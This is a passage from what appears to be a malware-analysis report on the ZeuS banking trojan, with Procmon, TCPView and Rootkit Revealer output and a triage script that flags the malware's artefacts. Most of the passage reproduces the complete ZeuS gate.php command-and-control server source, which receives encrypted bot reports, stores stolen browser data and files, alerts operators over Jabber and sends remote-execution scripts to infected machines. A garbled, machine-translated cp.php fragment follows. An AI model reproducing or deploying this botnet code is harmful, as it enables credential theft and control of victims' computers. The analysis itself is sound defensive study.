PM, LastWriteTime: 8/23/2010 12:12:02 PM, ChangeTime: 3/23/2011 10:15:32 PM, AllocationSize: 1,056,768, EndOfFile:
1,054,208, FileAttributes: A
QueryOpen C:\Documents and Settings\Kevin\Cookies\index.dat SUCCESS CreationTime: 3/22/2011 9:33:30 PM,
LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM, ChangeTime: 4/24/2011 8:03:51 PM,
AllocationSize: 32,768, EndOfFile: 32,768, FileAttributes: A
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][2].TXT SUCCESS
CreationTime: 4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:22 PM, LastWriteTime: 4/24/2011 7:59:22 PM,
ChangeTime: 4/24/2011 7:59:22 PM, AllocationSize: 192, EndOfFile: 185, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@BING[1].TXT SUCCESS CreationTime:
4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:23 PM, LastWriteTime: 4/24/2011 7:59:23 PM, ChangeTime: 4/24/2011
7:59:23 PM, AllocationSize: 200, EndOfFile: 200, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@GOOGLE[1].TXT SUCCESS
CreationTime: 4/24/2011 7:44:16 PM, LastAccessTime: 4/24/2011 7:58:30 PM, LastWriteTime: 4/24/2011 7:44:17 PM,
ChangeTime: 4/24/2011 7:44:17 PM, AllocationSize: 352, EndOfFile: 350, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS CreationTime:
4/24/2011 7:44:41 PM, LastAccessTime: 4/24/2011 7:44:41 PM, LastWriteTime: 4/24/2011 7:44:41 PM, ChangeTime: 4/24/2011
7:44:41 PM, AllocationSize: 72, EndOfFile: 69, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS
CreationTime: 4/24/2011 7:44:38 PM, LastAccessTime: 4/24/2011 7:44:38 PM, LastWriteTime: 4/24/2011 7:44:38 PM,
ChangeTime: 4/24/2011 7:44:38 PM, AllocationSize: 288, EndOfFile: 286, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS
CreationTime: 4/24/2011 7:44:39 PM, LastAccessTime: 4/24/2011 7:44:39 PM, LastWriteTime: 4/24/2011 7:44:39 PM,
ChangeTime: 4/24/2011 7:44:39 PM, AllocationSize: 200, EndOfFile: 196, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MICROSOFT[1].TXT SUCCESS
CreationTime: 4/24/2011 7:46:29 PM, LastAccessTime: 4/24/2011 7:46:31 PM, LastWriteTime: 4/24/2011 7:46:31 PM,
ChangeTime: 4/24/2011 7:46:31 PM, AllocationSize: 456, EndOfFile: 452, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\KEVIN@MOOKIE1[2].TXT SUCCESS
CreationTime: 4/24/2011 7:46:03 PM, LastAccessTime: 4/24/2011 7:46:03 PM, LastWriteTime: 4/24/2011 7:46:03 PM,
ChangeTime: 4/24/2011 7:46:03 PM, AllocationSize: 176, EndOfFile: 172, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Cookies\[email protected][1].TXT SUCCESS
CreationTime: 4/24/2011 7:59:22 PM, LastAccessTime: 4/24/2011 7:59:22 PM, LastWriteTime: 4/24/2011 7:59:22 PM,
ChangeTime: 4/24/2011 7:59:22 PM, AllocationSize: 120, EndOfFile: 115, FileAttributes: ANCI
QueryOpen C:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat SUCCESS
CreationTime: 3/22/2011 9:33:30 PM, LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM,
ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 49,152, EndOfFile: 49,152, FileAttributes: A
QueryOpen C:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat SUCCESS
CreationTime: 3/22/2011 9:33:30 PM, LastAccessTime: 3/22/2011 9:33:30 PM, LastWriteTime: 4/24/2011 8:03:50 PM,
ChangeTime: 4/24/2011 8:03:51 PM, AllocationSize: 425,984, EndOfFile: 425,984, FileAttributes: A
ReadFile C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR SUCCESS Offset: 327,680, Length: 8,192
ReadFile C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA SUCCESS Offset: 5,693,440,
Length: 8,192
RegCreateKey HKLM\Software\Microsoft\WBEM\CIMOM SUCCESS Desired Access: Read
RegCreateKey HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History
SUCCESS Desired Access: Read, Create Sub Key
RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Logging SUCCESS Type: REG_SZ, Length: 4,
Data: 1
RegQueryValue HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size SUCCESS Type: REG_SZ,
Length: 12, Data: 65536
RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic
Provider\Image Path SUCCESS Type: REG_SZ, Length: 22, Data: rsaenh.dll
RegQueryValue HKLM\SYSTEM\Setup\SystemSetupInProgress SUCCESS Type: REG_DWORD, Length: 4, Data:
0
RegQueryValue HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 001\Name SUCCESS
Type: REG_SZ, Length: 80, Data: Microsoft Strong Cryptographic Provider
RegQueryValue HKLM\SOFTWARE\Microsoft\COM3\REGDBVersion SUCCESS Type: REG_BINARY, Length:
8, Data: 07 00 00 00 00 00 00 00
RegQueryValue HKCR\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID SUCCESS Type:
REG_SZ, Length: 78, Data: {8BC3F05E-D86B-11D0-A075-00C04FB68820}
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:
REG_SZ, Length: 16, Data: winmgmt
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) SUCCESS Type:
REG_SZ, Length: 78, Data: Windows Management and Instrumentation
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService SUCCESS Type:
REG_SZ, Length: 16, Data: winmgmt
RegQueryValue HKCR\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission SUCCESS
Type: REG_BINARY, Length: 180, Data: 01 00 04 80 94 00 00 00 A4 00 00 00 00 00 00 00
WriteFile C:\WINDOWS\system32\wbem\Logs\wbemcore.log SUCCESS Offset: 13,965, Length: 91
WriteFile C:\WINDOWS\Prefetch\VERCLSID.EXE-3667BD89.pf SUCCESS Offset: 0, Length: 28,186
WriteFile C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat SUCCESS Offset: 0, Length:
4,096, I/O Flags: Non-cached, Paging I/O, Synchronous Paging I/O
The WinMerge comparison shows that the files are completely different before and after. I then used a spreadsheet and filtered the results to find the "after" file items of interest based on "Process Name" and the "Success" value of the registry access result. From inspection of the Procmon output it is evident that many registry keys are being modified and a lot of system files are being created. The WinMerge output of the ListDLLs results shows those that were created. Directories are being queried and the MAC times of the files are being captured. "verclsid.exe" is an open MS vulnerability9 that was published in 2006 and fixed with a service pack. The "winlogon.exe" process is being controlled by the malware file "sdra64.exe". Under "explorer.exe" every directory on the system was queried and the contents of each folder were enumerated; the same query was done for the volume information of the hard drive. The "explorer.exe" QueryNameInformationFile operations gave the details of the files on the system, and the "explorer.exe" RegQueryValue operations returned numerous values covering all the important details of the computer system. "svchost.exe" is usually where we would see the application program running, and a lot of system changes occur under this process.
9 http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx
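The triage described above (filtering the Procmon export for the artefacts the report identifies: the lowsec directory, user.ds / local.ds, sdra64.exe, and reads of the user's browser cookie stores) can be scripted instead of done in a spreadsheet. The following is an added example, not code from the report; the sample lines are constructed to match the format of the Procmon text output shown above, and the indicator list is limited to the file names the report itself names.

```python
"""Triage Procmon text-export lines for the ZeuS artefacts named in the report.

Added example, not part of the original report. Sample lines are constructed
in the same "Operation Path Result Detail" layout as the Procmon output above.
"""
import re
from collections import Counter

# Operation names seen in the Procmon export (multi-word names must come first).
OPERATIONS = (
    "Process Create", "CreateFile", "QueryOpen", "ReadFile", "WriteFile",
    "FlushBuffersFile", "RegCreateKey", "RegQueryValue", "RegSetValue",
)
RESULTS = ("SUCCESS", "NAME NOT FOUND", "ACCESS DENIED", "BUFFER OVERFLOW", "REPARSE")

# Paths may contain spaces, so the path is matched lazily up to a known result token.
LINE_RE = re.compile(
    r"^(?P<op>" + "|".join(re.escape(o) for o in OPERATIONS) + r")\s+"
    r"(?P<path>.+?)\s+"
    r"(?P<result>" + "|".join(RESULTS) + r")\s*"
    r"(?P<detail>.*)$"
)

# File names and directories the report identifies as ZeuS artefacts.
ZEUS_FILES = {"user.ds", "local.ds", "user.ds.lll", "sdra64.exe"}
ZEUS_DIRS = ("\\system32\\lowsec",)


def parse_line(line):
    """Return a dict with op/path/result/detail, or None for lines that are not events."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(event):
    """Map one parsed event to an indicator label, or None if nothing stands out."""
    lower = event["path"].lower()
    base = lower.rsplit("\\", 1)[-1]
    if base in ZEUS_FILES or any(d in lower for d in ZEUS_DIRS):
        return "zeus-artefact"
    if event["op"] == "WriteFile" and lower.endswith(".exe"):
        return "executable-written"
    if "\\cookies\\" in lower or lower.endswith("\\index.dat"):
        # Browser artefact reads are what the report observes the malware doing.
        return "browser-artefact-access"
    return None


def triage(lines):
    """Parse every line; return (Counter of indicator labels, list of flagged events)."""
    hits = []
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        label = classify(ev)
        if label:
            ev["label"] = label
            hits.append(ev)
    return Counter(h["label"] for h in hits), hits


# Constructed sample lines mirroring the Procmon output above (not a real capture).
SAMPLE = [
    r"CreateFile C:\WINDOWS\system32\lowsec\user.ds.lll SUCCESS Desired Access: Generic Read/Write, Attributes: H",
    r"CreateFile C:\WINDOWS\system32\lowsec\local.ds SUCCESS Desired Access: Generic Read",
    r"QueryOpen C:\Documents and Settings\Kevin\Cookies\index.dat SUCCESS CreationTime: 3/22/2011 9:33:30 PM",
    r"QueryOpen C:\WINDOWS\win.ini SUCCESS CreationTime: 8/23/2001 8:00:00 AM",
    r"Process Create C:\WINDOWS\system32\wbem\wmiprvse.exe SUCCESS PID: 3540, Command line: C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding",
    r"RegQueryValue HKLM\SYSTEM\Setup\SystemSetupInProgress SUCCESS Type: REG_DWORD, Length: 4, Data: 0",
    r"WriteFile C:\WINDOWS\system32\sdra64.exe SUCCESS Offset: 0, Length: 296,960",
    "some non-event line",
]

if __name__ == "__main__":
    counts, flagged = triage(SAMPLE)
    for ev in flagged:
        print(f"{ev['label']:26} {ev['op']:16} {ev['path']}")
    print(dict(counts))
```

Running the block on the constructed sample flags three ZeuS artefacts and one browser-artefact access; on a real Procmon text export the same labels, grouped by process name, give the "after" list the report builds by hand.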
WinMerge TCPView
Only the differences between the "before" and "after" captures are shown.
Process      PID   Protocol  Local Address               Local Port  Remote Address        Remote Port  State        Sent Packets  Sent Bytes  Rcvd Packets  Rcvd Bytes
svchost.exe  1572  UDP       xpwupdates                  bootpc      *                     *                         3             903
svchost.exe  1144  TCP       xpwupdates.tampabay.rr.com  1301        host53.webserver.com  http         ESTABLISHED  2             1,074       2             442
Rootkit Revealer
HKLM\SECURITY\Policy\Secrets\SAC* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)
HKLM\SECURITY\Policy\Secrets\SAI* 3/22/2011 9:41 PM 0 bytes Key name contains embedded nulls (*)
C:\WINDOWS\system32\lowsec 4/24/2011 8:02 PM 0 bytes Hidden from Windows API.
C:\WINDOWS\system32\lowsec\local.ds 4/24/2011 8:02 PM 34.27 KB Hidden from Windows API.
C:\WINDOWS\system32\lowsec\user.ds 4/24/2011 7:41 PM 2.37 KB Hidden from Windows API.
C:\WINDOWS\system32\lowsec\user.ds.lll 3/23/2011 11:46 PM 1.34 KB Hidden from Windows API.
C:\WINDOWS\system32\sdra64.exe 4/24/2011 8:02 PM 290.00 KB Hidden from Windows API.
C:\WINDOWS\system32\sdra64.exe:Zone.Identifier 4/24/2011 8:02 PM 26 bytes Hidden from Windows API.
Inspection of the cp.php and gate.php
gate.php (Russian comments were translated with google translator online):
<?php
define('__REPORT__', 1);

/*
  Gate.

  The bot <-> server protocol: the bot side sends a report about something,
  the server side sends changes to the settings (or commands). The bot sends
  information about one event/object at a time.
*/

if (@$_SERVER['REQUEST_METHOD'] !== 'POST') die();
require_once('system/global.php');
require_once('system/config.php');

// Get the data.
$data      = @file_get_contents('php://input');
$data_size = @strlen($data);
if ($data_size < HEADER_SIZE + ITEM_HEADER_SIZE) die();
$data = RC4($data, BOTNET_CRYPTKEY);

// Verification. If the MD5 matches there is no point in checking anything else.
if (strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0) die();

// Parse the data (data compression is not supported).
// Congratulations mega hackers, this algorithm will let you read from a bot easily. Don't forget to write a parser and 100 backdoors.
$list = array();
for ($i = HEADER_SIZE; $i < $data_size;)
{
  $k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
  $list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
  $i += (ITEM_HEADER_SIZE + $k[3]);
}
unset($data);

// The main parameters that must always be present.
if (empty($list[SBCID_BOT_VERSION]) || empty($list[SBCID_BOT_ID])) die();

// Connect to the database.
if (!ConnectToDB()) die();

////////////////////////////////////////////////////////////////////////////////
// Process the data.
////////////////////////////////////////////////////////////////////////////////

$bot_id           = str_replace("\x01", "\x02", trim($list[SBCID_BOT_ID]));
$bot_id_q         = addslashes($bot_id);
$botnet           = (empty($list[SBCID_BOTNET])) ? DEFAULT_BOTNET : str_replace("\x01", "\x02", trim($list[SBCID_BOTNET]));
$botnet_q         = addslashes($botnet);
$bot_version      = ToUint($list[SBCID_BOT_VERSION]);
$real_ipv4        = trim((!empty($_GET['ip']) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR']));
$country          = GetCountryIPv4(); //str_replace("\x01", "\x02", GetCountryIPv4());
$country_q        = addslashes($country);
$curtime          = time();
$rtime_min_online = $curtime - BOTNET_TIMEOUT; // Minimum time for which the bot counts as online.

// Report on script execution.
if (!empty($list[SBCID_SCRIPT_ID]) && isset($list[SBCID_SCRIPT_STATUS], $list[SBCID_SCRIPT_RESULT]) && strlen($list[SBCID_SCRIPT_ID]) == 16)
{
  if (!@mysql_query("INSERT INTO botnet_scripts_stat SET bot_id='{$bot_id_q}', bot_version={$bot_version}, rtime={$curtime}, ".
                    "extern_id='".addslashes($list[SBCID_SCRIPT_ID])."', ".
                    "type=".(ToInt($list[SBCID_SCRIPT_STATUS]) == 0 ? 2 : 3).", ".
                    "report='".addslashes($list[SBCID_SCRIPT_RESULT])."'")) die();
}
// Write log/files.
else if (!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))
{
  $type = ToInt($list[SBCID_BOTLOG_TYPE]);

  if ($type == BLT_FILE)
  {
    // Extensions that could be executed remotely.
    $bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml', '.phtm');
    $fd_hash  = 0;
    $fd_size  = strlen($list[SBCID_BOTLOG]);

    // Generate the file name.
    if (IsHackNameForPath($bot_id) || IsHackNameForPath($botnet)) die();
    $file_root = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);
    $file_path = $file_root;
    $last_name = '';
    $l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown'));
    foreach ($l as &$k)
    {
      if (IsHackNameForPath($k)) die();
      $file_path .= '/'.($last_name = urlencode($k));
    }
    if (strlen($last_name) === 0) $file_path .= '/unknown.dat';
    unset($l);

    // Check the extension and set the file mask.
    if (($ext = strrchr($last_name, '.')) === false || in_array(strtolower($ext), $bad_exts) !== false) $file_path .= '.dat';
    $ext_pos = strrpos($file_path, '.');

    // FIXME: if the name is too long.
    if (strlen($file_path) > 180) $file_path = $file_root.'/longname.dat';

    // Add the file.
    for ($i = 0; $i < 9999; $i++)
    {
      if ($i == 0) $f = $file_path;
      else $f = substr_replace($file_path, '('.$i.').', $ext_pos, 1);

      if (file_exists($f))
      {
        if ($fd_size == filesize($f))
        {
          if ($fd_hash === 0) $fd_hash = md5($list[SBCID_BOTLOG], true);
          if (strcmp(md5_file($f, true), $fd_hash) === 0) break;
        }
      }
      else
      {
        if (!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb'))) die();
        flock($h, LOCK_EX);
        fwrite($h, $list[SBCID_BOTLOG]);
        flock($h, LOCK_UN);
        fclose($h);
        break;
      }
    }
  }
  else
  {
    // Write to the database.
    if (REPORTS_TO_DB === 1)
    {
      $table = 'botnet_reports_'.gmdate('ymd', $curtime);
      $query = "INSERT DELAYED INTO {$table} SET bot_id='{$bot_id_q}', botnet='{$botnet_q}', bot_version={$bot_version}, type={$type}, country='{$country_q}', rtime={$curtime}, ".
               "path_source='".(empty($list[SBCID_PATH_SOURCE]) ? '' : addslashes($list[SBCID_PATH_SOURCE]))."', ".
               "path_dest='".(empty($list[SBCID_PATH_DEST]) ? '' : addslashes($list[SBCID_PATH_DEST]))."', ".
               "time_system=".(empty($list[SBCID_TIME_SYSTEM]) ? 0 : ToUint($list[SBCID_TIME_SYSTEM])).", ".
               "time_tick=".(empty($list[SBCID_TIME_TICK]) ? 0 : ToUint($list[SBCID_TIME_TICK])).", ".
               "time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).", ".
               "os_version='".(empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."', ".
               "language_id=".(empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).", ".
               "process_name='".(empty($list[SBCID_PROCESS_NAME]) ? '' : addslashes($list[SBCID_PROCESS_NAME]))."', ".
               "process_user='".(empty($list[SBCID_PROCESS_USER]) ? '' : addslashes($list[SBCID_PROCESS_USER]))."', ".
               "ipv4='".addslashes($real_ipv4)."', ".
               "context='".addslashes($list[SBCID_BOTLOG])."'";

      // I think this arrangement improves performance.
      if (!@mysql_query($query) && (!@mysql_query("CREATE TABLE IF NOT EXISTS {$table} LIKE botnet_reports") || !@mysql_query($query))) die();
    }

    // Write to file.
    if (REPORTS_TO_FS === 1)
    {
      if (IsHackNameForPath($bot_id) || IsHackNameForPath($botnet)) die();
      $file_path = REPORTS_PATH.'/other/'.urlencode($botnet).'/'.urlencode($bot_id);
      if (!CreateDir($file_path) || !($h = fopen($file_path.'/reports.txt', 'ab'))) die();
      flock($h, LOCK_EX);
      fwrite($h, str_repeat("=", 1980)."\r\n".
                 "bot_id={$bot_id}\r\n".
                 "botnet={$botnet}\r\n".
                 "bot_version=".IntToVersion($bot_version)."\r\n".
                 "ipv4={$real_ipv4}\r\n".
                 "country={$country}\r\n".
                 "type={$type}\r\n".
                 "rtime=".gmdate('H:i:s d.m.Y', $curtime)."\r\n".
                 "time_system=".(empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', ToInt($list[SBCID_TIME_SYSTEM])))."\r\n". // time() also returns an int.
                 "time_tick=".(empty($list[SBCID_TIME_TICK]) ? 0 : TickCountToTime(ToUint($list[SBCID_TIME_TICK]) / 1000))."\r\n".
                 "time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : TimeBiasToText(ToInt($list[SBCID_TIME_LOCALBIAS])))."\r\n".
                 "os_version=".(empty($list[SBCID_OS_INFO]) ? '' : OSDataToString($list[SBCID_OS_INFO]))."\r\n".
                 "language_id=".(empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID]))."\r\n".
                 "process_name=".(empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME])."\r\n".
                 "process_user=".(empty($list[SBCID_PROCESS_USER]) ? '' : $list[SBCID_PROCESS_USER])."\r\n".
                 "path_source=".(empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE])."\r\n".
                 "context=\r\n".$list[SBCID_BOTLOG]."\r\n\r\n\r\n");
      flock($h, LOCK_UN);
      fclose($h);
    }

    if (REPORTS_JN === 1) IMNotify($type, $list, $bot_id);
  }
}
// Report on online status.
else if (!empty($list[SBCID_BOT_STATUS]))
{
  // Standard query.
  $query = "bot_id='{$bot_id_q}', botnet='{$botnet_q}', bot_version={$bot_version}, country='{$country_q}', rtime_last={$curtime}, ".
           "net_latency=".(empty($list[SBCID_NET_LATENCY]) ? 0 : ToUint($list[SBCID_NET_LATENCY])).", ".
           "port_s1=".(empty($list[SBCID_PORT_S1]) ? 0 : ToUshort($list[SBCID_PORT_S1])).", ".
           "time_localbias=".(empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : ToInt($list[SBCID_TIME_LOCALBIAS])).", ".
           "os_version='".(empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO]))."', ".
           "language_id=".(empty($list[SBCID_LANGUAGE_ID]) ? 0 : ToUshort($list[SBCID_LANGUAGE_ID])).", ".
           "ipv4='".addslashes($real_ipv4)."', ".
           "flag_nat=IF(net_latency > 0, IF(port_s1 > 0, 0, 1), 1)"; // FIXME: NAT detection of bots.

  if (!mysql_query("INSERT INTO botnet_list SET comments='', rtime_first={$curtime}, rtime_online={$curtime}, flag_install=".(ToInt($list[SBCID_BOT_STATUS]) == BS_INSTALLED ? 1 : 0).", {$query} ".
                   "ON DUPLICATE KEY UPDATE rtime_online=IF(rtime_last <= {$rtime_min_online}, {$curtime}, rtime_online), {$query}")) die();

  // Find the script to send.
  $reply_data  = '';
  $reply_count = 0;
  $bot_id_qm   = ToSQLSafeMask($bot_id_q);
  $botnet_qm   = ToSQLSafeMask($botnet_q);
  $country_qm  = ToSQLSafeMask($country_q);

  $r = @mysql_query("SELECT extern_id, script_bin, send_limit, id FROM botnet_scripts WHERE flag_enabled=1 AND ".
                    "(countries_wl='' OR countries_wl LIKE BINARY '%\x01{$country_qm}\x01%') AND ".
                    "(countries_bl NOT LIKE BINARY '%\x01{$country_qm}\x01%') AND ".
                    "(botnets_wl='' OR botnets_wl LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ".
                    "(botnets_bl NOT LIKE BINARY '%\x01{$botnet_qm}\x01%') AND ".
                    "(bots_wl='' OR bots_wl LIKE BINARY '%\x01{$bot_id_qm}\x01%') AND ".
                    "(bots_bl NOT LIKE BINARY '%\x01{$bot_id_qm}\x01%') ".
                    "LIMIT 10");
  if ($r) while ((($m = mysql_fetch_row($r))))
  {
    $eid = addslashes($m[0]);

    // Check whether the send limit has been reached.
    if ($m[2] != 0 && ($j = @mysql_query("SELECT COUNT(*) FROM botnet_scripts_stat WHERE type=1 AND extern_id='{$eid}'")) && ($c = mysql_fetch_row($j)) && $c[0] >= $m[2])
    {
      @mysql_query("UPDATE botnet_scripts SET flag_enabled=0 WHERE id={$m[3]} LIMIT 1");
      continue;
    }

    // Add the bot to the list of bots the script was sent to.
    if (@mysql_query("INSERT HIGH_PRIORITY INTO botnet_scripts_stat SET extern_id='{$eid}', type=1, bot_id='{$bot_id_q}', bot_version={$bot_version}, rtime={$curtime}, report='Sended'"))
    {
      $size = strlen($m[1]) + strlen($m[0]);
      $reply_data .= pack('LLLL', ++$reply_count, 0, $size, $size).$m[0].$m[1];
    }
  }

  if ($reply_count > 0)
  {
    $reply_data = pack('LLL', HEADER_SIZE + strlen($reply_data), 0, $reply_count).md5($reply_data, true).$reply_data;
    echo RC4($reply_data, BOTNET_CRYPTKEY);
    die();
  }
}
else die();

// Send an empty reply.
SendEmptyReply();

////////////////////////////////////////////////////////////////////////////////
// Functions.
////////////////////////////////////////////////////////////////////////////////

/*
  Send an empty reply and exit.
*/
function SendEmptyReply()
{
  echo RC4(pack('LLL', HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1)."\x4A\xE7\x13\x36\xE4\x4B\xF9\xBF\x79\xD2\x75\x2E\x23\x48\x18\xA5"."\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", BOTNET_CRYPTKEY);
  die();
}

/*
  Getting the country.

  Return - string, country.
*/
function GetCountryIPv4()
{
  global $real_ipv4;
  $ip = sprintf('%u', ip2long($real_ipv4));
  if (($r = @mysql_query("SELECT c FROM ipv4toc WHERE l <= '".$ip."' AND h >= '".$ip."' LIMIT 1")) && ($m = mysql_fetch_row($r)) !== false) return $m[0];
  else return '--';
}

/*
  Conversion Bin2UINT.

  IN $str - string, the original binary string.

  Return - int, the converted number.
*/
function ToUint($str)
{
  $q = @unpack('L', $str);
  return is_array($q) && is_numeric($q[1]) ? ($q[1] < 0 ? sprintf('%u', $q[1]) : $q[1]) : 0;
}

/*
  Conversion Bin2INT.

  IN $str - string, the original binary string.

  Return - int, the converted number.
*/
function ToInt($str)
{
  $q = @unpack('l', $str);
  return is_array($q) && is_numeric($q[1]) ? $q[1] : 0;
}

/*
  Conversion Bin2SHORT.

  IN $str - string, the original binary string.

  Return - int, the converted number.
*/
function ToUshort($str)
{
  $q = @unpack('S', $str);
  return is_array($q) && is_numeric($q[1]) ? $q[1] : 0;
}

/*
  Checks whether a name is unsafe to use as part of a path.

  IN $name - name to check.

  Return - true if the name is unsafe, false if it is not.
*/
function IsHackNameForPath($name)
{
  return (strlen($name) > 0 && strcmp($name, '..') !== 0 && strcmp($name, '.') !== 0 && strpos($name, '/') === false && strpos($name, '\\') === false && strpos($name, "\x00") === false) ? false : true;
}

function IMNotify(&$type, &$list, &$bot_id)
{
  if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE]))
  {
    $ml = split("\x01", REPORTS_JN_LIST);
    foreach ($ml as &$mask)
    {
      if (@preg_match('#^'.str_replace('\\*', '.*', preg_quote($mask, '#')).'$#i', $list[SBCID_PATH_SOURCE]) > 0)
      {
        $message = htmlentities("Bot ID: ".$bot_id."\nURL: ".$list[SBCID_PATH_SOURCE]."\n\n".substr($list[SBCID_BOTLOG], 0, 1024));
        error_reporting(0);

        if (strlen(REPORTS_JN_LOGFILE) > 0 && ($fh = @fopen(REPORTS_JN_LOGFILE, 'at')) !== false)
        {
          @fwrite($fh, $message."\n\n".str_repeat('=', 1940)."\n\n");
          @fclose($fh);
        }

        require_once("system/jabberclass.php");
        $jab = new Jabber;
        $jab->server   = REPORTS_JN_SERVER;
        $jab->port     = REPORTS_JN_PORT;
        $jab->username = REPORTS_JN_ACCOUNT;
        $jab->password = REPORTS_JN_PASS;
        if ($jab->Connect())
        {
          $jab->SendAuth();
          $jab->SendPresence(NULL, NULL, "online");
          $jab->SendMessage(REPORTS_JN_TO, "normal", NULL, array("body" => $message));
          $jab->Disconnect();
        }

        if (strlen(REPORTS_JN_SCRIPT) > 0)
        {
          $eid        = md5($mask, true);
          $script     = 'rexec "'.trim(REPORTS_JN_SCRIPT).'" -f';
          $size       = strlen($eid) + strlen($script);
          $reply_data = pack('LLLL', 1, 0, $size, $size).$eid.$script;
          echo RC4(pack('LLL', HEADER_SIZE + strlen($reply_data), 0, 1).md5($reply_data, true).$reply_data, BOTNET_CRYPTKEY);
          die();
        }
        break;
      }
    }
  }
}
?>
cp.php (Russian comments were translated with google translator online):
<? Php define ('__CP__', 1);
require_once ('system / global.php');
if (! @ include_once ('system / config.php')) die ('Hello! How are you?');
////////////////////////////////////////////////// /////////////////////////////
/ / Constants. ////////////////////////////////////////////////// /////////////////////////////
define ('CURRENT_TIME', time ()); / / Current time. define ('ONLINE_TIME_MIN', (CURRENT_TIME - BOTNET_TIMEOUT)); / / Minimum time for the status of "Online."
define ('DEFAULT_LANGUAGE', 'en'); / / default language.
define ('THEME_PATH', 'theme'); / / folder for the theme.
/ / HTTP requests.
define ('QUERY_SCRIPT', basename ($ _SERVER ['PHP_SELF'])); define ('QUERY_SCRIPT_HTML', QUERY_SCRIPT);
define ('QUERY_VAR_MODULE', 'm'); / / variable points to the current module. define ('QUERY_STRING_BLANK', QUERY_SCRIPT. '? m ='); / / Empty query string.
define ('QUERY_STRING_BLANK_HTML', QUERY_SCRIPT_HTML. '? m ='); / / Empty query string in HTML.
define ('CP_HTTP_ROOT', str_replace ('\ \', '/', (! empty ($ _SERVER ['SCRIPT_NAME'])? dirname ($ _SERVER ['SCRIPT_NAME']):'/'))); / / The root of the CP.
/ / A session cookie. define ('COOKIE_USER', 'p'); / / username in cookies.
define ('COOKIE_PASS', 'u'); / / user password in the cookie.
define ('COOKIE_LIVETIME', CURRENT_TIME + 2592000) / / Lifetime of cookies. define ('COOKIE_SESSION', 'ref'); / / variable to store the session.
define ('SESSION_LIVETIME', CURRENT_TIME + 1300) / / Lifetime of the session.
////////////////////////////////////////////////// /////////////////////////////
/ / Initialize.
////////////////////////////////////////////////// /////////////////////////////
/ / Connect to the database.
if (! ConnectToDB ()) die (mysql_error_ex ());
/ / Connect the topic.
